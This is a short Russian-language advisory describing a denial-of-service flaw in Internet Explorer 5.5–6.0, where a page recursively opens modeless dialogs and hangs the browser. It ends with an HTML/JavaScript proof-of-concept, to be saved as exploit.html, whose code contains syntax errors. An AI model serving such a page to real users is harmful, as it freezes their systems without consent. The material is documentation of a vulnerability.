Немодальный (modeless) метод диалога — диалоговое окно, которое продолжает отображать события, даже когда пользователь переключился к другим программам. 

Проблема, найденная в Microsoft Internet Explorer, позволяет злонамеренному Web хосту
организовать DoS атаку на  пользователя.
Если немодальный метод диалога, включенный в HTML документ, пропускает этот HTML документ в инициализированном цикле
— система виснет.

Узвимость найдена в IE 5.5-6.0. 

Эксплоит

Назовите файл exploit.html, и вставте в него этот код

<html>
<head>
<script type="javascript">
function exploit() {
while(1) { 
showModelessDialog("exploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>



Оставить мнение